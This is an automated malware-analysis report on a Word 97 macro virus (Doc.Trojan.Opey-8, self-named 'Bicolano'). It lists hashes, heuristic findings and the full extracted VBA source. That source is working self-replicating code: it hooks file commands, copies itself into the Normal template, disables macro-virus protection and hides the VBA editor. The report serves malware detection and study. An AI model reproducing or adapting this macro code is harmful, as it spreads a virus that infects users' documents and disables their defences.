Doc.Trojan.Opey-8 Office (OLE) malware analysis — malicious · 9fdab6b2c40a8f07

MALICIOUS

Office (OLE)

47.0 KB Created: 1997-09-17 11:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 61076ed6d7f87185c299742a8b2f990d SHA-1: bb03db0814933cf915e9258dad6f783d83e341d5 SHA-256: 9fdab6b2c40a8f0751074c60f6b2094826a29bc3756093597dd7ff399bf8d97c

248 Risk Score

Malware Insights

Doc.Trojan.Opey-8 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic

The file exhibits characteristics of a legacy WordBasic macro virus and contains VBA macros, including an AutoOpen macro, which are commonly used to initiate malicious actions upon opening the document. ClamAV detection confirms this as Doc.Trojan.Opey-8, a known malware family. The macro code is truncated, preventing a detailed analysis of its specific actions, but its presence strongly suggests an attempt to execute malicious code.

Heuristics 5

ClamAV: Doc.Trojan.Opey-8 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Opey-8
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
                                                                                 Tempo.CodeModule.DeleteLines 1, Tempo.CodeModule.CountOfLines
```

AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro

Matched line in script

                                                                           Sub AutoOpen()

Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	19131 bytes
SHA-256: `220e04490ca0163f5545b1f4e921b67461163f57e49c0c23247b138acf6f812c`
Detection ClamAV: Doc.Trojan.Opey-8 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Bicolano" Dim CarrierName As String Dim VictimName As String Dim IDString As String Dim Author As String Dim NT As Object Dim AD As Object Dim NTInfected As Boolean Dim ADInfected As Boolean Dim DocCount As Integer Private Sub MainOfBicolano() Initialize CleanMe NT If Not NTInfected Then CopyBicolano CarrierName, VictimName If DocCount > 0 Then CleanMe AD If Not ADInfected Then CopyBicolano CarrierName, VictimName End If Call Action End Sub Private Sub CleanMe(Dirty) Dim AttachedMacro Dim Tempo As Object Dim Name As String On Error Resume Next NTInfected = False ADInfected = False For Each AttachedMacro In Dirty.VBProject.VBComponents Name = AttachedMacro.Name If (Name <> IDString) And (Name <> "ThisDocument") Then Application.OrganizerDelete Dirty.FullName, Name, wdOrganizerObjectProjectItems ElseIf Name = IDString Then If Dirty = NT Then NTInfected = True If Dirty = AD Then ADInfected = True End If Set Tempo = Dirty.VBProject.VBComponents(1) Tempo.CodeModule.DeleteLines 1, Tempo.CodeModule.CountOfLines Next AttachedMacro End Sub Private Sub CopyBicolano(Src, Dst) Application.OrganizerCopy Src, Dst, IDString, wdOrganizerObjectProjectItems End Sub Private Sub Initialize() Dim Carrier On Error Resume Next Activate IDString = "Bicolano" Author = "JACH" DocCount = Documents.Count Set NT = NormalTemplate If DocCount > 0 Then Set AD = ActiveDocument Carrier = MacroContainer If (Carrier = NT) And (DocCount > 0) Then CarrierName = NT.FullName VictimName = AD.FullName ElseIf (Carrier = AD) And (DocCount > 0) Then CarrierName = AD.FullName VictimName = NT.FullName End If End Sub Private Sub Activate() On Error Resume Next Application.UserName = "Bicolano" Application.UserInitials = "JACH" Application.UserAddress = "Naga City, Philippines" System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\MS Setup (ACME)\User Info", "DefName") = "Ma - uurag kami" System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\MS Setup (ACME)\User Info", "DefCompany") = "Bicolano" With Dialogs(wdDialogFileSummaryInfo) .Author = "Bicolano" .Title = "Magaling ang mga Bicolano" .Execute End With With Options .ConfirmConversions = False .SaveNormalPrompt = False .VirusProtection = False End With On Error Resume Next CommandBars("Visual Basic").Visible = False CommandBars("Visual Basic").Enabled = False CommandBars("Visual Basic").Protection = msoBarNoChangeVisible CommandBars("Visual Basic").Protection = msoBarNoCustomize CustomizationContext = NormalTemplate FindKey(KeyCode:=BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable FindKey(KeyCode:=BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable End Sub Sub FileSave() On Error Resume Next MainOfBicolano ActiveDocument.Save End Sub Sub FileClose() On Error Resume Next MainOfBicolano If ActiveDocument.Saved = False Then ActiveDocument.Save ActiveDocument.Close End Sub Sub FileExit() On Error Resume Next MainOfBicolano If ActiveDocument.Saved = False Then ActiveDocument.Save Application.Quit End Sub Sub FileNew() On Error Resume Next Dialogs(wdDialogFileNew).Show newfile$ = 1 MainOfBicolano End Sub Sub AutoOpen() On Error Resume Next MainOfBicolano End Sub Sub AutoExec() On Error Resume Next MainOfBicolano End Sub Sub FileSaveAs() On Error Resume Next MainOfBicolano Dialogs(wdDialogFileSaveAs).Show End Sub Sub FilePageSetup() On Error Resume Next MainOfBicolano Dialogs(wdDialogFilePageSetup).Show End Sub Sub FilePrint() On Error Resume Next MainOfBicolano Dialogs(wdDialogFilePrint).Show End Sub Sub FileOpen() On Error Resume Next Dialogs(wdDialogFileOpen).Show MainOfBicolano End Sub Sub ViewVBCode() MainOfBicolano End Sub Sub ToolsMacro() MainOfBicolano End Sub Private Sub Action() If (WeekDay(Date) = vbWednesday) And (Month(Date) > 11) Then If Minute(Time) > 50 Then Beep MsgBox "I love UPLB and FOREHA!", vbInformation, "Mauurag ang mga Bicolano" Beep MsgBox "See more of me soon!!! Bye!!", vbCritical, "Bicolano" Application.Quit wdDoNotSaveChanges End If End If End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.